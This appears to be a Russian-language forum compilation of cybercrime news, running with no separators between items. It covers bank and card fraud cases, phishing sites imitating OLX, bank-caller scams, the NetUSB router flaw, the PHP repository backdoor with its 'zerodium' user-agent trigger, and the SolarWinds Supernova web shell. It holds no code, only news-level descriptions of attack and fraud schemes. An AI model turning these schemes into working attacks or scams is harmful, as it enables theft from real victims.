В пресс-релизе федеральной прокуратуры Восточного округа Калифорнии 8 сентября 2015 года сообщалось, что Кирилюк с тремя сообщниками в США и неназванным хакером в Москве начал с кражи двух сотен регистрационных карточек студентов отдела образования в районе Сан-Хуан в Сакраметно. В карточках были личные данные студентов, включая их имена и номера социального обеспечения (social security), то есть информация, с помощью которой мошенники начали открывать корпорации на имена этих студентов, которые об этом не знали. Помимо них аферисты пользовались именами молодых россиян, прибывавших в США по временным студенческим визам J-1, за что их называют “джейваньщиками”. Находящийся в Москве хакер трудился на славу и передал в Сакраменто примерно 119 тыс. похищенных им номеров счетов и кредитных карт банка.
По уже установленной и проверенной преступной схеме на имена и документы “джейваньщиков” открывались банковские счета, куда через счета подставных корпораций поступали украденные у American Express деньги, которые снимались и уходили на руки мошенникам и хакеру в Москву. В деле Кирилюка фигурируют три “джейваньщицы” – Дарья Пучкова, Евгения Романова и Ангелина Кикот, которые приехали в США в мае 2012 года, жили в Сакраменто и уехали в октябре того же года. Своим корпорациям-однодневкам аферисты умышленно давали громкие названия, напоминающие всем известные компании, – CVS Store, Walt Mart, Chevran, 24 Quick Stop, Best Box, Marshall Store, Stop Shop Market, Whole Store и другие.
По данным суда, из 3,4 млн похищенных долларов Кирилюк, Маслов, Ахмеров и Мелконян оставили себе всего 600-700 тысяч, а остальное перевели в Москву. Находившийся там хакер проходит в деле по своему сетевому псевдониму «Non 202». Связываясь с сообщниками в США через сайт Jabber, он брал себе 30-40% наживы, получая ее банковскими переводами, предоплаченными кредитными картами Green Dot и даже почтовой контрабандой, когда купюры вкладывались между страниц журналов. В деле проходит свидетелем женщина-осведомитель, а всего федеральное обвинение вызвало в суд по делу Руслана Кирилюка 57 свидетелей, среди которых были 18 агентов ФБР, один сотрудник Секретной Службы и один из иммиграционной полиции ICE.
В производстве следственного отдела ОМВД России по Усть-Лабинскому району находится уголовное дело, возбужденное в отношении 20-летнего жителя Оренбургской области по признакам преступления, предусмотренного частью 4 статьи 158 УК РФ «Кража».
По данным следствия, злоумышленник, находясь в городе Бугуруслан Оренбургской области,нашел в открытом доступе в сети Интернет данные банковского счета , открытого на имя жителя Усть-Лабинска. С помощью мобильного приложения на своем телефоне злоумышленник несколькими транзакциями перевел с чужого счета более 2 млн рублей. Похищенные деньги мужчина потратил на личные нужды.
В настоящее время злоумышленнику предъявлено обвинение в инкриминируемом деянии. Санкции статьи предусматривают максимальное наказание в виде лишения свободы на срок до десяти лет. На период предварительного следствия обвиняемому избрана мера пресечения в виде заключения под стражу.
Киберполиция разоблачила мошенников, которые, находясь в СИЗО, продавали автомобили для ВСУ. В результате преступных действий пострадали военные.
По данным правоохранителей, "схему" организовали двое жителей Сумской области, которые отбывают наказание в одном из учреждений областного центра.
Привлекая к преступной деятельности сообщников по "воле", мошенники размещали объявления о продаже нерастаможенных автомобилей на популярных онлайн- платформах.
Основным условием покупки была подписка в размере от 2 до 10 тысяч гривен.
В настоящее время установлены 10 потерпевших, в том числе военнослужащие ВСУ. Общая сумма ущерба составляет около 200 тысяч гривен .
По состоянию на данный момент, по данным полиции, было проведено 13 обысков. Изъято:
Организаторам "схемы" объявлено подозрение по ч. 3 ст. 190 (мошенничество) УКУ. В случае доказывания вины подозреваемым грозит до 5 лет лишения свободы.
Приговоры за антигосударственную деятельность.
source: cyberpolice.gov.ua/news/prodavaly-z-sizo-avtivky-dlya-zsu- kiberpolicziya-sumshhyny-vykryla-shaxrayiv-5703
Умер Брам Моленар (Bram Moolenaar), автор текстового редактора Vim. Из прожитых 62 лет 31 год Брам посвятил развитию проекта Vim, в который он вносил подавляющее большинство изменений (для сравнения Брам внёс 16.5 тыс. коммитов и добавил 3.5 млн строк кода, в то время как второй по активности разработчик Vim добавил 239 коммитов и 69 тысяч строк кода). Последний коммит Брама в репозиторий Vim датирован 8 июля. Судя по объявлению родственников Брама причиной смерти стала быстро прогрессирующая болезнь, из-за которой он угас за несколько недель.
Группа Vice Society создала новый логотип в стиле Vice City
Vice Society взяла на себя ответственность за атаки на различные медицинские учреждения и муниципалитеты.
RCE-уязвимость в библиотеке для программных оболочек, отвечающей за сетевые подключения к USB-устройствам, подвергает серьезному риску миллионы роутеров ведущих производителей. Пока официально опубликовал исправления только Netgear.
Брешь в ядре
Уязвимость в библиотеке NetUSB ставит под угрозу миллионы роутеров популярных производителей. Выявившие эту уязвимость эксперты компании Sentinel Labs оценили ее как высокоопасную, хотя и не критическую.
NetUSB — компонент ядра Linux, разработанный компанией Kcodes. Он позволяет USB-устройствам, подключенным непосредственно к роутеру, взаимодействовать с сетевыми устройствами в локальной сети.
«Например, вы можете взаимодействовать с сетевым принтером так, будто он подключен непосредственно к вашему компьютеру по USB. Для этого потребуется драйвер на компьютере, который обеспечит взаимодействие с роутером через данный модуль ядра», — написал эксперт Sentinel Labs Макс Ван Амеронген (Max Van Amerongen).
Библиотека была разработана в начале 2010-х годов. KCodes лицензировала ее таким производителям роутеров как Netgear, TP-Link, Tenda, EDiMAX, D-Link и Western Digital.
Лишние вызовы
Проблема этой библиотеки заключается в том, что она «слушает» вызовы от USB- устройств, поступающие не только из внутренней сети, но и с внешнего интерфейса, подключаемого к интернету. Исследователи выяснили, что направив специально подготовленную команду на TCP-порт 20005 роутера, использующего библиотеку NetUSB, можно вызвать ошибку целочисленного переполнения и, как следствие, запустить произвольный код на уровне ядра операционной системы. Фактически это означает перехват контроля над устройством.
По мнению Ван Амеронгена, создание эксплойта потребует довольно высокого уровня технологической подготовки, однако как только такой эксплойт окажется в общем доступе, волны атак долго ждать не придется.
Пока, впрочем, никаких попыток эксплуатировать обнаруженную уязвимость (ей присвоен индекс CVE-2021-45388) не наблюдается.
Обновления ПО
Представители SentinelLabs передали информацию об уязвимости в KCodes в сентябре 2021 г. В ноябре KCodes разослала патчи конечным производителям роутеров и сообщила, что обновления к прошивкам должны будут поступить до 20 декабря.
Однако, по [данным](https://therecord.media/soho-routers-impacted-by-bug-in- usb-over-network-component/) издания TheRecord, пока только Netgear официально признала наличие проблемы в своих устройствах, опубликовала их список и ссылки на соответствующие обновления программных оболочек.
Другие вендоры не торопятся это делать; пользователям роутеров с USB-портами рекомендуется вручную проверить наличие обновления прошивок и установить их, если возможно.
«Роутеры, как и многие другие IoT-устройства, смело можно относить к наиболее уязвимым и одновременно игнорируемым элементам локальных сетей, хотя как раз за ними следовало бы приглядывать с особым вниманием, — говорит Алексей Водясов, технический директор компании SEQ. — Любая серьезная уязвимость в программной оболочке роутера открывает потенциальным злоумышленникам доступ ко многим, если не всем, ресурсам локальной сети, а такие уязвимости обнаруживаются часто, чтобы не сказать, регулярно. И, к сожалению, обновление роутеров пользователи осуществляют не слишком часто».
Никакой экзотики
Эксперты SentinelLabs в декабре 2021 г. обнаружили также уязвимости в библиотеке EltimaSDK, используемой множественными облачными провайдерами для обеспечения сетевого доступа к USB-устройствам.
В свою очередь, в 2019 г. фирма Eclypsium обнаружила уязвимость в сетевом USB- компоненте в контроллерах управления материнской платой Supermicro, используемых в barebone-серверах во множестве дата-центров по всему миру.
Таким образом, подобные уязвимости нельзя назвать экзотикой, даже если их эксплуатация не всегда оказывается тривиальной задачей.
• Source: <https://www.sentinelone.com/labs/cve-2021-45608-netusb-rce-flaw-in- millions-of-end-user-routers/>
Студенты на Мальте, начинающие исследователи, в качестве гонорара по BugBounty получили уголовное дело и могут присесть на 4 года после раскрытия уязвимости в ПО FreeHour, которое используется местными образовательными учреждениями.
Как [сообщает](https://timesofmalta.com/articles/view/we-wanted-help-students- arrested-exposing-freehour-security-flaw.1024757), (https://timesofmalta.com/articles/view/we-wanted-help-students-arrested- exposing-freehour-security-flaw.1024757) Times of Malta студенты сообщили об уязвимости разработчику приложения в октябре прошлого года, предоставив ему трехмесячный срок для исправление и намекнули на вознаграждение.
Джорджио Григоло, Майкл Дебоно, Люк Бьорн Шерри и Люк Коллинз сканировали ПО, когда обнаружили уязвимость, которую, по их словам, могли использовать злоумышленники.
Обнаруженная ими уязвимость могла привести к потенциальной утечке личных данных пользователей ПО, включая адреса электронной почты, данные о местоположении и календаря Google.
Ошибка также позволяла вносить изменения в интерфейс приложения, чем они однажды воспользовались, чтобы убедиться в ее практической применимости.
Все получилось, поскольку основанная на Parse инфраструктура FreeHour, как оказалось, не была должным образом адаптирована.
После апробации студенты решили направить результаты своих изысканий по электронке разработчику. Намекнув на гонорар, тем не менее не называли конкретную сумму.
К удивлению юных ресерчеров через месяц после этого к ним нагрянули силовики с арестом и обысками. Им предъявили обвинения в несанкционированном доступе и изъяли компьютерную технику.
В свою очередь, FreeHour в своем [блоге](https://www.freehour.eu/post/statement-what-freehour-is-doing-after- learning-what-happened-to-the-4-students) заявили, что неправильно истолковали первоначальный отчет и приняли его за попытку вымогательства, уведомив об этом власти соответствующим образом.
По итогу рецепт BugBounty по-мальтийски: FreeHour отрапортовала об и исправлении уязвимости и сохранности всех пользовательских данных, киберполицейские срубили галку, а юные дарования - уголовку.
Один из разработчиков Tornado Cash выпустил демо-версию нового миксера криптовалют, который даст пользователям возможность обойти запрет, введенный Министерством финансов США.
Инициатором создания нового криптомиксера выступил один из ведущих разработчиков Tornado Cash Амин Сулеймани (Ameen Soleimani). Он сообщил, что Минфин США ввел санкции против Tornado Cash на основании того, что участники северокорейской хакерской организации Lazarus Group активно использовали платформу для отмывания украденных денег.
По заявлению Сулеймани, новый криптомиксер Privacy Pools «продолжит с того места, где остановился Tornado Cash, но на этот раз так, чтобы власти США не вмешивались». Обновленное приложение дополнено функционалом, который не только позволит владельцам криптоактивов анонимно отправлять и получать криптовалюту, но также будет проверять, что пользователь сервиса не является членом северокорейской группы Lazarus или иной незаконной организации.
В феврале нидерландский окружной суд Восточного Брабанта постановил, что главный разработчик криптомиксера Tornado Cash Алексей Перцев должен оставаться в заключении до следующего слушания, назначенного на 21 апреля 2023 года, пока длится процесс по его обвинению в отмывании денег.
Ранее в этом месяце компания Google начала тестирование новой технологии отслеживания пользователей под названием Federated Learning of Cohorts (FLoC) , которая объединяет пользователей в анонимные сегменты или «когорты» в зависимости от их интересов и поведения в интернете.
В отличие от сторонних файлов cookie, используемых рекламодателями для отслеживания поведения и интересов на разных сайтах, FLoC встроена в сам браузер, который распределяет людей по определенным "когортам" и передает эту информацию сайтам и рекламодателям.
Издание Bleeping Computer отмечает, что разработчики Google включили поддержку FLoC в Chromium Google по умолчанию, то есть другие компании, которые разрабатывают браузеры на основе Chromium (в том числе Microsoft Edge), тоже будут автоматически устанавливать этот компонент, если только не отключат его специально. Как заметили журналисты, в Microsoft Edge FLoC выключен, а компонент недоступен в браузере, даже если включить его с помощью командной строки.


Когда издание обратилось к разработчикам за комментарием по данному вопросу, в Microsoft не дали однозначного ответа, но инсайдеры издания говорят, что пока в компании планируют подождать и понаблюдать, как развивается FLoC, прежде чем переходить на какую-либо конкретную платформу.
«Мы верим в будущее, в котором интернет сможет обеспечивать для людей конфиденциальность, прозрачность и контроль, а также поддерживать ответственные бизнес-модели для создания живой, открытой и разнообразной экосистемы. Равно как и Google, мы поддерживаем решения, которые позволяют пользователям выразить четкое согласие и не пытаются обойти выбор потребителей. Именно поэтому мы не поддерживаем решения, которые используют опознавательные сигналы пользователей без их согласия, в том числе фингерпринтинг. Отрасль развивается <…> и мы продолжим изучать разные подходы вместе с сообществом», — пишут инженеры Microsoft.
Click to expand...
Также эксперты компании упоминают свой проект PARAKEET, который тоже является одной из альтернатив сторонним cookie: здесь идентификатор пользователя известен только прокси-серверу, где он тщательно искажается статистическим «шумом» и лишь после этого передается рекламодателю.
Ранее опасения по поводу FLoC выразили многие другие разработчики:
Источник: xakep.ru/2021/04/20/edge-floc/
Группа ученых из Университета Бен-Гуриона (Израиль), Университета Аделаиды (Австралия) и Университета Мичигана (США) представила исследовательскую работу под названием «Prime+Probe 1, JavaScript 0: Overcoming Browser-based Side- Channel Defenses», посвященную атакам по стороннему каналу (side-channel) с использованием браузеров.
В своем докладе исследователи демонстрируют, что side-channel атаки на браузеры по-прежнему возможны, несмотря на все усилия производителей и все меры по их устранению. Хуже того, подобные атаки работают даже в защищенных браузерах, ориентированных на конфиденциальность, которые были специально защищены от атак типа Spectre, включая браузер Tor, Chrome с расширением Chrome Zero и Firefox с расширением DeterFox.
Эксперты пишут, что даже при полностью отключенном JavaScript атака по стороннему каналу, основанная исключительно на HTML и CSS, тоже может привести к утечке достаточного количества данных из браузера. Такой утечки (даже без JS) хватит для того, чтобы с чуть меньшей точностью идентифицировать и отслеживать пользователей, определяя, к примеру, какие сайты посещал человек.
При этом с докладе подчеркивается, что атаки были протестированы не только против браузеров, работающих в системах на процессорах Intel (которые в прошлом чаще всего оказывались уязвимы для атак по сторонним каналам), но и против браузеров, работающих в системах с процессорами Samsung Exynos, AMD Ryzen и даже новыми чипом M1 от Apple. В итоге данное исследование стало первым случаем, когда side-channel атака сработала против Apple M1.

Эксперты говорят, что уведомили инженеров Intel, AMD, Apple, Chrome и Mozilla о своих выводах еще до публикации исследовательской работы, однако не сообщается, какие ответы были получены от производителей.
Стоит заметить, что недавно разработчики Google Chrome признавали, что даже невзирая на новую функцию Site Isolation, атаки по сторонним каналам в современных браузерах невозможно заблокировать полностью. Также инженеры Google говорили о том, что side-channel атаки вскоре перестанут нуждаться в JavaScript и будут осуществляться только с помощью CSS. Чтобы защититься от таких проблем, они призвали разработчиков пересмотреть подход к созданию сайтов и обработке данных.
Источник: xakep.ru/2021/03/11/m1-side-channel/
В декабре прошлого года многие ИБ-компании занимались расследованием масштабной атаки на цепочку поставок, от которой пострадала компания SolarWinds и ее клиенты. Уже тогда в отчетах экспертов упоминалась не только полезная нагрузка SUNBURST (она же Solorigate), загружавшая бэкдор-троян Teardrop, но и тот факт, что порой злоумышленники внедряли в зараженные сети .NET веб-шелл под названием Supernova.
Сначала исследователи считали, что хакеры применяли Supernova для загрузки, компиляции и выполнения вредоносного Powershell-скрипта (который назвали CosmicGale). Однако вскоре аналитики Microsoft сообщили, что Supernova – часть другой атаки, и она вообще не связана с нашумевшей атакой на цепочку поставок. Оказалось, что веб-шелл Supernova был внедрен в плохо защищенные установки SolarWinds Orion, уязвимые перед проблемой CVE-2019-8917.
В отчете Microsoft сообщалось, что в отличие от Sunburst DLL, файл Supernova DLL не был подписан легитимным сертификатом SolarWinds. Из-за этого эксперты пришли к выводу, что данная малварь не имела отношения к исходной атаке на цепочку поставок и вообще принадлежала другой хак-группе.

Теперь выводы Microsoft подтвердили специалисты Secureworks. На этой неделе компания обнародовала отчет, согласно которому, Supernova связана с прошлогодними атаками на серверы Zoho ManageEngine (причем информацию об этом 0-day баге просто опубликовали в Twitter).
Secureworks отслеживает злоумышленников, атаковавших Zoho ManageEngine, под кодовым именем Spiral, и считает, что эта хак-группа базируется в Китае. Так, во время августовского инцидента хакеры случайно раскрыли один из своих IP- адресов, который оказался связан с Поднебесной.
Как теперь пишут исследователи, поведение малвари Supernova схоже с активностью группировки в августе прошлого года, направленной против продукции Zoho. Похоже, за обе эти атаки может быть ответственна Spiral, то есть аналитики Microsoft были правы.
Источник: xakep.ru/2021/03/09/solarwinds-spiral/
Службы безопасности нейтрализовали в Киеве преступную организацию, которая воровала деньги с банковских счетов украинцев.
В ходе комплексных мероприятий задержаны 12 участников группировки.
Задокументировано, что только в одном из эпизодов они украли более 10 млн грн с депозитного счета столичного нотариуса. Эти деньги принадлежали Фонду гарантирования вкладов физических лиц и предназначались для выплат пострадавшим вкладчикам ликвидированных банков.
По данным следствия, злоумышленники создали вредоносное программное обеспечение, которое давало им доступ к электронным кабинетам вкладчиков одного из киевских банков.
Искать потенциальных «жертв» помогали сообщники, которые работали в различных финучреждениях Киева.
Через них фигуранты получали персональные данные жителей столицы, открывавшие депозитные счета в банке.
Затем киберпреступники присылали фишинговое сообщение на электронную почту вкладчика, которое маскировали под «обновление услуги банкинга» от администрации финучреждения.
Таким образом злоумышленники получали логин и пароль для управления счетами и переводили с них деньги на банковские карточки, оформленные на подставных лиц.
Кроме того, в ходе расследования сотрудники СБУ обнаружили по местам жительства фигурантов скрытые нарколаборатории по выращиванию оптовых партий каннабиса.
Готовую «продукцию» они реализовывали через собственные связи среди наркодилеров.
Во время обысков в офисных помещениях и домах фигурантов обнаружено:
компьютерную технику, банковские карточки и семеркарты мобильных операторов с доказательствами незаконной деятельности;
оптовую партию каннабиса на почти 8 млн грн.
Злоумышленники находятся под стражей. Им грозит до 12 лет заключения.
По информации издания «Известия», в России использование чужой или поддельной карты будет квалифицироваться как уголовное преступление. Теперь трата или снятие денег с банковской карты может грозить человеку, даже просто нашедшему карту и решившему ее корыстно использовать, до шести лет лишения свободы.
Соответствующие поправки по поводу запрета пользования чужой картой и счетом были внесены в постановление пленума «О судебной практике по делам о краже, грабеже и разбое». Причем факт хищения с банковской карты теперь автоматически приравнивается к хищению в крупном размере и относится к категории тяжких преступлений.
По большей части нововведение должно коснуться мошенников, которые обманным путем выманивают у жертв доступ к их банковскому счету, а потом многочисленными небольшими переводами начинают его опустошать различным образом. Теперь эти действия будут квалифицироваться судом как кража по признаку «с банковского счета, а равно в отношении электронных денежных средств», согласно пункту «г» ч. 3 ст.158 УК РФ.
Лицам, которые будут продолжать такую деятельность грозит штраф в размере от 100 тыс. рублей до 500 тыс. рублей, принудительные работы на срок до пяти лет с ограничением свободы на срок до 1,5 лет, а также лишение свободы на срок до шести лет. А в случае совершения финансового преступления организованной группой либо в особо крупном размере, даже до 10 лет лишения свободы.
Ранее подобные действия злоумышленников квалифицировались судом как мошенничество, а в качестве наказания был штраф до ста двадцати тыс. рублей. Однако, теперь их действия будут квалифицироваться по ст.158 УК РФ по новому лишь в том случае, если они именно похитят денежные средства с банковского счета (или электронные денежные средства) без ведома пострадавшего, использовав необходимую для получения доступа к ним конфиденциальную информацию владельца денежных средств, например, персональные данные владельца, данные платежной карты, контрольную информацию, пароли. Если они получат доступ к данным клиента банка или будут действовать совместно с ним, например, обманутый человек сам снимет деньги или переведет их на сторонние счета — это будет квалифицироваться как мошенничество.
Полиции в сотрудничестве с финансовыми учреждениями удалось вернуть жертвам более 34 000 евро, которые у них в течение последнего месяца по телефону выманили представляющиеся сотрудниками банка мошенники.
Деньги пострадавшим, большинство из которых проживают в Харьюмаа и Ида- Вирумаа, возвращают с 14 мая. Полностью или частично полиции в сотрудничестве с финансовыми учреждениями удалось остановить переводы со счетов 29 человек, из них 10 человек получат выманенные деньги в полном объеме. Треть пострадавших получат назад значительную сумму и еще треть маленькую часть снятых денег. Двоим пострадавшим вернули почти 11 000 евро в апреле.
По словам руководителя криминального бюро Идаской префектуры Райнета Юузе, полиция свяжется с пострадавшими, чтобы сообщить, кто и в каком объеме получит деньги.
"Нескольким жертвам вернут тысячи евро. К сожалению, все переводы не удалось до конца остановить, но финансовое учреждение возвратит все, что удалось вернуть. Это наглядный пример тому, что если у вас появляется минимальное подозрение, что вы стали жертвой мошенничества, надо как можно быстрее связаться с банком и полицией. Так есть надежда, но какой-то перевод можно ставить. Чем больше времени пройдет, тем меньше, к сожалению, вероятность вообще когда-нибудь вернуть деньги", — сказал Юузе.
Во всех этих случаях использовали одну схему. Мошенник звонил по телефону, говорил по-русски, представлялся работником Swedbank и сообщал, что на счету человека кто-то совершил подозрительные сделки. Под предлогом, что банк может помочь, мошенник спрашивал данные, чтобы зайти в интернет-банк, например, признак пользователя и личный код, затем просил ввести пароли Smart-ID. Мошенник утверждал, что это необходимо для установки двухэтапной системы защиты. Получив доступ к счету, деньги переводились на чужие счета.
Руководитель бюро криминальной информации Центральной криминальной полиции Тоомас Плаадо сказал, что для усложнения жизни мошенников полиция использует новые приемы и активно сотрудничает с банками и другими финансовыми учреждениями, чтобы остановить перевод денег и по возможности остановить переводы.
"В случае телефонных мошенничеств, когда преступники представляются сотрудниками банка, деньги со счета пострадавших переводятся очень быстро. Mы установили, что мошенники использовали для перевода денег счета в одном местном финансовом учреждении. Это было, так сказать, временно место для хранения денег и оттуда деньги переводились за границу. Мы связались с этим учреждением, попросили придерживать сделки с определенным почерком и в случае, если выяснится, что это мошенничество, замораживать сделки. Это учреждение достаточно быстро установило дополнительные фильтры и таким образом планы мошенников провались. Крайне важно усложнить осуществление таких переводов, чтобы Эстония не была такой привлекательной для мошенников", — рассказал Плаадо.
Так как мошенники потерпели неудачу при переводе с нескольких счетов и не смогли получить доступ к выманенным деньгам, они прекратили использование этого финансового учреждения. "Это положительный пример тому, как можно усложнить жизнь преступникам и одновременно помочь пострадавшим. Мы работаем над тем, чтобы установить личность мошенников и сотрудничаем в том числе и с полицией других стран", — добавил Тоомас Плаадо.
Райнет Юузе сказал, что полиция ищет новые возможности для того, чтобы увеличить информированность возможных жертв о том, как распознать мошенничество и оставить преступников без дохода. "Нельзя терять бдительность, мошенники не оставляют попыток получить ваши деньги. Однако очень радует то, что все больше полиции поступает таких сообщений, когда человек знает, что это мошенничество, не выдает ПИН-коды или другие данные и не позволяет нанести себе ущерб", — сказал Юузе.
Банк останавливает более половины нападений на счета, блокируя сомнительные сделки в самом начале. Но за четыре месяца этого года полиция начала 119 уголовных дел о мошенничестве по схеме "звонок из банка". В сумме жителям Эстонии нанесли ущерб почти в 500 000 евро.
С 10 марта 2021 года работа Twitter на территории России замедлена на 100% с мобильных устройств и на 50% со стационарных устройств по решению Роскомнадзора. Это связано с тем, что, по утверждениям представителей ведомства, «Twitter в период с 2017 года по настоящее время не удаляется контент, склоняющий несовершеннолетних к совершению самоубийств, содержащий детскую порнографию, а также информацию об использовании наркотических средств».
В конце прошлой неделе, на круглом столе «Вынужденное замедление "Твиттера" — выводы для всех» в Роскомнадзоре сообщали, что так и не дождались какого-либо ответа на замедление со стороны руководства Twitter. Как мы писали ранее, руководство социальной сети распространило пресс-релиз среди СМИ, в котором отмечало, что в компании «глубоко обеспокоены участившимися попытками заблокировать и ограничить публичные обсуждения в интернете».
«Наши претензии остаются без ответа, никто на нас не выходил, на наши вопросы ответов нет. В любом случае все свои встречные претензии они могут в любой момент оспорить в российском суде, мы готовы к любому диалогу, лишь бы он был», — заявил начальник управления контроля и надзора в сфере электронных коммуникаций Роскомнадзора Евгений Зайцев.
Click to expand...
Сегодня, 16 марта 2021 года, в беседе с журналистами ТАСС заместитель главы ведомства Вадим Субботин и вовсе сообщил, что Роскомнадзор может рассмотреть возможность полной блокировки сервиса:
«Мы взяли месяц и наблюдаем за реакцией компании Twitter по вопросу удаления запрещенной информации. После чего, в зависимости от действия администрации социальной сети, будут приняты соответствующие решения. Если Twitter не исполнит требования Роскомнадзора, требования российского законодательства, соответственно, будем рассматривать вопрос о полной блокировке сервиса на территории России».
Click to expand...
Источник: xakep.ru/2021/03/16/twitter-blocking/
В минувшие выходные два вредоносных коммита (1, 2) были отправлены в Git- репозиторий php-src, поддерживаемый командой PHP на сервере git.php.net. Злоумышленники утверждали, что просто пытаются «исправить опечатку» и подписали эти коммиты именами известных разработчиков и сопровождающих PHP: Расмуса Лердорфа и Никиты Попова.

На самом деле вместо исправления опечатки атакующие пытались внедрить бэкдор в кодовую базу PHP. Если бы вредоносный код попал в рабочую среду, он позволил бы злоумышленникам выполнять собственные команды на серверах жертв.
Первым бэкдор заметил чешский разработчик Майкл Воржишек (Michael Voříšek), который писал, что для выполнения вредоносного кода атакующие должны отправить HTTP-запрос на уязвимый сервер, содержащие HTTP-хедер с user-agent, который начинался бы со строки zerodium (название известной компании-брокера уязвимостей).
Команда PHP уже официально подтвердила попытку атаки на цепочку поставок и сообщила, что Попов и Лердорф к инциденту отношения, разумеется, не имеют. Хотя расследование инцидента еще продолжается (других вредоносных коммитов не обнаружено), по словам специалистов, атака произошла из-за компрометации git.php.net, а не из-за взлома учетной записи конкретного пользователя.
Вредоносные коммиты не продержали в коде и нескольких часов: их оперативно заметили и удалили. Теперь в качестве меры предосторожности специалисты по сопровождению PHP приняли решение полностью перенести официальный репозиторий на GitHub, а поддержка git.php.net вскоре будет прекращена.
Источник: xakep.ru/2021/03/29/php-repo-hack/
Две молодых айтишников обманули более 100 украинцев, похитив свыше 250 тысяч гривен при помощи сайтов, имитирующих популярный сервис объявлений OLX и сервис безопасных сделок компании «Новая Почта».
Эту противоправную деятельность двух молодых программистов из Днепра раскрыли и пресекли сотрудники Запорожского управления Киберполиции, совместно со следователями районного управления НПУ. Обвиняемые, возрастом 21 и 24 года, изготавливали на заказ фишинговые сайты для кражи денег граждан.
Разработчики, при помощи технологии «фрейминга» полностью копировали внешний вид официальных интернет-ресурсов OLX и НП, с целью ввести в заблуждение посетителей этих сайтов. Далее, они передавали ссылки на эти сайты они своим «заказчикам», которые непосредственно и распространяли их для осуществления мошеннических схем «ОЛХ Доставка» и «Сервис безопасных сделок Новой Почты».
Попадая на такие сайты, посетители (как правило, продавцы), убежденные, что находятся на официальном интернет-ресурсе известной компании, должны были вводить данные своих банковских карт, чтобы получить денежный перевод от клиента. На самом деле, таким образом они переводили деньги со своих карт в пользу мошенников.
За свои услуги по разработке сайтов, задержанные молодые люди получали до 70% комиссии от суммы украденного с каждой карты. Таким образом, согласно оценке правоохранителей, черные веб-дизайнеры смогли заработать на своих поделках не меньше 175 тысяч гривен.
Во время обыска дома у одного из подозреваемых была изъята компьютерная техника, а также «рабочие заметки», мобильные телефоны и банковские карточки. Пока группа захвата ломала двери в квартиру, молодой человек пытался уничтожить один из ноутбуков, избавляясь от улик, однако, жесткий диск компьютера все-таки уцелел.
Помимо этого, как удалось установить следователям, молодые люди занимались взломом аккаунтов пользователей упомянутых интернет-сервисов, с применением метода автоматического подбора паролей (брутфорс). Доступ ко взломанным аккаунтам они также продавали мошенникам для дальнейшего использования в целях обмана граждан.
В отношении подозреваемых открыто уголовное дело по ч.1 ст. 361 УК Украины (несанкционированное вмешательство в работу компьютерных систем. Наказание за данное преступление предусматривает до 3 лет лишения свободы.
Как сообщает местное издание Bangkok Post, полиция Таиланда арестовала гражданина России за предоставление туристам услуг по обмену криптовалют.
Сотрудники тайской полиции изучили ряд объявлений в интернете о приобретении и продаже криптовалют в районах Самуи и Ко Панган в Сурат Тани, где часто останавливаются туристы из других стран. Указанные в объявлениях телефонные номера, на которые были зарегистрированы аккаунты в WhatsApp, оказались связаны с банковскими счетами граждан России Ибрагима Гайтукиева и Максима Варюхина.
Следователи установили, что Гайтукиев и Варюхин были руководителями компании OM 118 Co на острове Панган в Сурат Тани. В качестве офиса компания использовала дом на пляже Шри Тану, в котором находился магазин «Plantasia Cannabis Collective». Перед магазином была размещена вывеска с надписью «Биткоин», а внутри — реклама обмена криптовалюты. Следователи считают, что магазин также использовался в качестве места для проведения операций по обмену криптовалют для туристов.
Полиция арестовала 36-летнего Ибрагима Гайтукиева в доме на пляже Шри Тану на острове Тамбон Ко Панган в южной провинции Таиланда. Во время допроса в полицейском участке Ибрагим Гайтукиев признал, что он и Максим Варюхин действительно оказывали услуги по обмену виртуальными активами туристам.
Гайтукиеву предъявлены обвинения в незаконном управлении криптовалютной площадкой. Полиция не предоставила подробностей относительно своих действий по отношению к Максиму Варюхину.
Работодатель – IBM. Все эти 15 лет он исправно платил Йену Клиффорду бабки, а это 54 тысячи фунтов стерлингов в год (примерно 5,2 млн.рублей), и обязался платить их до достижения работником пенсионного возраста (65 лет). Но повышать зарплату отказывался. Йен был очень недоволен. Говорил, инфляция-то не стоит на месте! Так не пойдет. В суд.
Но судья ему в возбуждении дела отказал. Сказал, браток, да ты совсем ох..ел, тебе готовы платить деньги, пока ты не сдохнешь от старости – сиди и не выеб…вайся, а то и это отнимут.
На этой неделе разработчики корпоративного мессенджера Slack анонсировали новую функцию Connect DM, которая позволяет отправлять сообщения напрямую любому пользователю Slack в любой организации. Разработчики позиционировали ее, как новый и удобный способ для связи с бизнес-партнерами.
Однако новая функциональность, включенная по умолчанию, совершенно не понравилась пользователям и ИБ-экспертам. Дело в том, что даже если у пользователя отключена функция Connect DM, он все равно будет получать email- уведомления и сообщения от всех, кто пытался связаться с ним, включая случайных людей, которые могут злоупотреблять этой функций, чтобы просто отправить кому-то порцию оскорблений. Хуже того, посторонние люди вдруг получили возможность обращаться напрямую к сотрудникам любых компаний и приглашать их в приватные чаты, где те могли подвергнуться фишинговым атакам и пострадать от социальной инженерии.
Реакция сообщества последовала незамедлительно. Так, в Twitter несколько экспертов по безопасности писали, что этой функцией можно злоупотреблять не только ради фишинга или распространения малвари, ее также можно использовать для рассылки спама и преследования конкретных людей. Проблема в том, что у пользователей не было никаких механизмов для блокирования подобных сообщений и даже возможности сообщить о злоупотреблениях администратору.
__https://twitter.com/x/status/1374737695444901891
__https://twitter.com/x/status/1374777625726525441
Из-за этого компании стали массово отключать Connect DM, а ИБ-специалисты советовали пользоваться этой функцией только вместе со строгими списками контроля доступа, позволяющими контролировать, какие сотрудники могут участвовать в межорганизационных чатах.
Журналисты издания Vice Motherboard связались с представителями Slack и спросили, что те намерены делать с возникшими проблемами. В компании признали, что допустили ошибку:
«После развертывания Slack Connect DM мы получили ценные отзывы от наших пользователей о том, что электронные приглашения к использованию данной функции могут потенциально применяться для отправки оскорбительных или раздражающих сообщений. Мы уже предпринимаем немедленные шаги для предотвращения подобных злоупотреблений: с сегодняшнего дня мы удалили возможность настройки пригласительных сообщений, в которых пользователь приглашает кого-то присоединиться к Slack Connect DM, — заявил Джонатан Принс, вице-президент Slack по коммуникациям и политике. — При первоначальном развертывании [новой функции] мы допустили ошибку, которая несовместима с нашими целями в отношении продукта и нормальным опытом использования Slack Connect».
Click to expand...
При этом представитель Slack отказался сообщить, планирует ли компания доработать Slack Connect DM в целом и, например, добавить столь необходимую функцию блокировки. В компании заявили, что с 2016 года в Slack действует команда Trust & Safety, однако Slack снимает с себя ответственность за модерирование своей платформы, перекладывая ее на компании, которые ею пользуются.
Источник: xakep.ru/2021/03/25/slack-connect-dm/
